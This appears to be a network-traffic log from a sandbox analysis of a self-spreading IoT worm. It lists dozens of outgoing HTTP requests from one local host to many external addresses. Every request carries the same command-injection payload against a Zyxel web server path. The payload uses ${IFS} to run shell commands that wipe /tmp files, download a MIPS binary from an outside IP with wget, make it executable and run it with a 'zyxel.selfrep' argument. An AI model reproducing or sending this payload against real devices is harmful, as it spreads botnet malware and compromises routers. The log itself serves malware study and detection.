                                          Jan 14, 2024 15:46:27.247154951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6929192.168.2.2346880166.62.200.244443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.247185946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6930192.168.2.2358198114.114.186.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.247222900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6931192.168.2.2338184110.67.187.69443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.247246981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6932192.168.2.2344554174.238.17.20443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.247265100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6933192.168.2.2352422119.184.1.198443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.247278929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6934192.168.2.2347040111.200.23.220443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.247349024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6935192.168.2.2346800155.55.51.239443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.247358084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6936192.168.2.2336612101.209.202.166443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.247419119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6937192.168.2.2347832174.205.124.120443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.247433901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6938192.168.2.233678077.240.38.69443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.247473955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6939192.168.2.2353360120.213.39.150443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.247514009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6940192.168.2.2357664185.116.240.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.247519016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6941192.168.2.2344332154.185.158.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.247553110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6942192.168.2.2353900181.60.106.203443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.247589111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6943192.168.2.2346246191.32.169.71443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.247617960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6944192.168.2.2341822104.246.150.174443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.247637033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6945192.168.2.235025050.153.216.42443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.247659922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6946192.168.2.2358104104.241.18.24443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.247692108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6947192.168.2.2359858200.250.42.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.247721910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6948192.168.2.2343320145.105.174.208443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.247756958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6949192.168.2.2352068169.159.175.240443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.247761965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6950192.168.2.234218049.28.116.248443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.247787952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6951192.168.2.233909263.157.215.192443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.247854948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6952192.168.2.2357724207.3.70.148443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.247879982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6953192.168.2.235145640.63.212.63443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.247891903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6954192.168.2.235753838.39.65.71443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.247914076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6955192.168.2.2338348151.213.179.108443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.247956038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6956192.168.2.2347676216.238.33.104443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.247992039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6957192.168.2.233702453.225.177.149443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.247992039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6958192.168.2.233588032.91.144.136443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.248033047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6959192.168.2.2353014163.160.20.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.248071909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6960192.168.2.234751614.236.106.76443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.248115063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6961192.168.2.2336786185.224.41.25443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.248132944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6962192.168.2.2338230146.129.227.241443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.248148918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6963192.168.2.235792882.178.176.37443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.248182058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6964192.168.2.236026446.25.104.178443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.248191118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6965192.168.2.2340876123.131.53.126443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.248240948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6966192.168.2.2338160162.87.144.206443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.248254061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6967192.168.2.2350608151.157.116.18443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.248281002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6968192.168.2.2344478190.17.222.204443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.248306036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6969192.168.2.2349448115.128.228.134443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.248333931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6970192.168.2.2336928132.1.178.123443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.248362064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6971192.168.2.2334048113.198.243.219443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.248385906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6972192.168.2.2343376181.189.147.94443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.248409986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6973192.168.2.2359714192.30.68.25443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.248430967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6974192.168.2.2347456191.129.194.112443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.248445034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6975192.168.2.2348146185.200.225.177443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.248466015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6976192.168.2.2340686174.122.34.83443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.248497009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6977192.168.2.235862074.105.137.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.248507977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6978192.168.2.236061219.60.29.132443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.248522997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6979192.168.2.2350376132.228.51.40443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.248562098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6980192.168.2.2355592206.192.120.204443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.248586893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6981192.168.2.235708874.164.172.158443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.248620987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6982192.168.2.236050886.66.44.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.248635054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6983192.168.2.2332802142.237.17.38443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.248673916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6984192.168.2.2347388111.82.255.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.248706102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6985192.168.2.2358722136.185.147.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.248730898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6986192.168.2.235610494.44.125.84443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.248755932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6987192.168.2.235294269.10.62.227443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.248790026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6988192.168.2.2342876209.169.160.119443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.248821974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6989192.168.2.2356732124.78.205.149443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.248847008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6990192.168.2.233476892.235.18.62443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:27.248867035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          6991192.168.2.234758881.18.214.238443
                                          TimestampBytes transferredDirectionData
